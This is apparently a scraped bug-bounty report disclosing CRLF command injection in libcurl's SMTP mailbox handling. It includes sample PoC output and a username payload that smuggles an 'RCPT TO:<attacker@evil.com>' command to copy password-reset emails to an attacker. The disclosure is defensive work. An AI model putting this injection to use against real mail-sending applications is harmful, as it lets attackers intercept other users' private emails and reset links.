{“lastseen”:”2025-11-10T11:25:46″,”description”:”libcurl’s SMTP implementation accepts CR (`\\\\r`) and LF (`\\\\n`) bytes in mailbox address inputs without validation. These control characters are inserted directly into SMTP commands, allowing attackers to inject arbitrary SMTP protocol commands. This enables envelope manipulation, adding unauthorized recipients, and potentially bypassing application-level email controls.\\n\\n### Steps To Reproduce\\n\\n**Environment:**\\n- Target: curl\/libcurl source code (https:\/\/github.com\/curl\/curl)\\n- Tested versions: \\n – curl 8.17.0 (latest official release) \u2705 VULNERABLE\\n – curl 8.12.0-DEV (commit 58023ba52273b05deb36ec1d395df18ba29b3bde) \u2705 VULNERABLE\\n- Build: Standard release build\\n- Date tested: 2025-11-06\\n\\n**Prerequisites:**\\n1. Build curl from source (commit 58023ba52273b05deb36ec1d395df18ba29b3bde)\\n2. Download the attached proof-of-concept script: `poc_smtp_crlf_injection.sh`\\n\\n**Steps:**\\n\\n1. Make the script executable:\\n“`bash\\nchmod +x poc_smtp_crlf_injection.sh\\n“`\\n\\n2. Run the proof-of-concept with the path to your curl binary:\\n“`bash\\n.\/poc_smtp_crlf_injection.sh \/path\/to\/curl\/src\/curl\\n“`\\n\\nThe script will:\\n- Start an SMTP server that logs all received commands\\n- Execute curl with a CRLF-injected mailbox address\\n- Display clear before\/after comparison\\n- Highlight the injected commands\\n\\n3. Observe the output showing the split SMTP commands\\n\\n**What should happen:** \\ncurl should reject the mailbox address containing control characters with an error like \\”invalid characters in mailbox address\\” or \\”control characters not allowed\\”, similar to how it rejects null bytes in HTTP headers.\\n\\n**What actually happens:** \\ncurl accepts the CRLF characters and sends them as part of the SMTP command, resulting in protocol-level command injection:\\n\\n“`\\n\\u003e MAIL FROM:\\u003csender@company.com\\n\\u003e RCPT TO:\\u003cattacker@evil.com\\u003e SIZE=… \u2190 INJECTED COMMAND\\n\\u003e RCPT TO:\\u003cvictim@company.com\\u003e \u2190 LEGITIMATE RECIPIENT\\n“`\\n\\nThe MAIL FROM command is split into two separate lines, with \\”RCPT TO:\\u003cattacker@evil.com\\u003e\\” being injected as a separate SMTP command. The email is now sent to both the legitimate recipient AND the attacker’s address.\\n\\n### Evidence\\n\\n**Attached file demonstrating the vulnerability:**\\n\\n**poc_smtp_crlf_injection.sh** – Complete, self-contained proof-of-concept script that:\\n- Starts a local SMTP server to capture commands\\n- Runs curl with CRLF-injected mailbox addresses\\n- Displays clear evidence of command injection\\n- Requires only Python 3 and bash (no other dependencies)\\n- Takes ~30 seconds to run\\n- Exit code 1 = vulnerable, 0 = patched\\n\\n**Sample output from the PoC script:**\\n\\n“`\\n\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\nVULNERABILITY CONFIRMED\\n\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n\\n\u2717 VULNERABLE: CRLF injection successful!\\n\\nSMTP Commands Sent by curl:\\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n\\u003e EHLO smtp_test_body.txt\\n\\u003e MAIL FROM:\\u003csender@company.com\\n\\u003e RCPT TO:\\u003cattacker@evil.com\\u003e SIZE=59 \u2190 INJECTED!\\n\\u003e RCPT TO:\\u003cvictim@company.com\\u003e\\n\\u003e DATA\\n\\nResult: Email sent to BOTH recipients:\\n \u2713 victim@company.com (legitimate)\\n \u2713 attacker@evil.com (INJECTED)\\n“`\\n\\nThe script output clearly shows:\\n1. The MAIL FROM command split into two lines\\n2. The injected RCPT TO command on a separate line\\n3. Both recipients being accepted by the SMTP server\\n4. Confirmation that the email would be sent to both addresses\\n\\n**Code analysis showing the vulnerability:**\\n\\nFile: `lib\/smtp.c`, lines 838-846\\n“`c\\nresult = Curl_pp_sendf(data, \\u0026smtpc-\\u003epp,\\n \\”MAIL FROM:%s%s%s%s%s%s\\”,\\n from, \/* Mandatory – NO VALIDATION *\/\\n auth ? \\” AUTH=\\” : \\”\\”,\\n auth ? auth : \\”\\”,\\n size ? \\” SIZE=\\” : \\”\\”,\\n size ? size : \\”\\”,\\n utf8 ? \\” SMTPUTF8\\” : \\”\\”);\\n“`\\n\\nFile: `lib\/smtp.c`, lines 1875-1921 (`smtp_parse_address`)\\n- Function performs basic parsing (strips `\\u003c\\u003e`, finds `@`)\\n- No validation for control characters (CR, LF, NUL)\\n- Strings are passed directly to command construction\\n\\n**Evidence that this is NOT by-design:**\\n\\ncurl already rejects control characters in similar contexts. From `lib\/cookie.c`, lines 436-446:\\n\\n“`c\\nstatic bool invalid_octets(const char *ptr) {\\n const unsigned char *p = (const unsigned char *)ptr;\\n \/* Reject all bytes \\\\x01 – \\\\x1f (*except* \\\\x09, TAB) + \\\\x7f *\/\\n while(*p) {\\n if(((*p != 9) \\u0026\\u0026 (*p \\u003c 0x20)) || (*p == 0x7f))\\n return TRUE;\\n p++;\\n }\\n return FALSE;\\n}\\n“`\\n\\nThis function explicitly rejects CR (0x0D) and LF (0x0A) in cookie values. The same validation should apply to SMTP mailbox addresses but is missing.\\n\\n## Impact\\n\\nAn attacker who controls email address inputs can inject SMTP commands by adding CRLF characters. This lets them add extra recipients to emails without the application knowing. For example, a password reset email meant for one person gets secretly copied to the attacker’s email address.\\n\\n**Real attack scenario:** A web app sends password reset emails using curl. An attacker registers username `victim\\\\r\\\\nRCPT TO:\\u003cattacker@evil.com\\u003e` on the platform. When the app constructs the email address and passes it to curl, curl injects the extra recipient command. The attacker receives a copy of the password reset link meant for the victim.\\n\\n**Why this matters:**\\n- Many apps build email addresses from usernames + domain without checking for control characters\\n- Apps expect the library to handle protocol-level validation (like curl does for cookies and HTTP headers)\\n- Attackers can steal sensitive emails: password resets, verification codes, confidential reports\\n- The vulnerability affects all apps using `CURLOPT_MAIL_FROM`, `CURLOPT_MAIL_RCPT`, or `CURLOPT_MAIL_AUTH` with any user input”,”published”:”2025-11-06T12:07:44″,”modified”:”2025-11-10T10:39:03″,”type”:”hackerone”,”title”:”curl: SMTP CRLF Command Injection in CURLOPT_MAIL_FROM and CURLOPT_MAIL_RCPT”,”source”:””,”references”:””,”id”:”H1:3414088″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3414088″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-11-10T11:25:46″,”description”:”libcurl’s SMTP implementation accepts CR (`\\\\r`) and LF (`\\\\n`) bytes in mailbox address inputs without validation. These control characters are inserted directly into SMTP commands,…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-25404","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n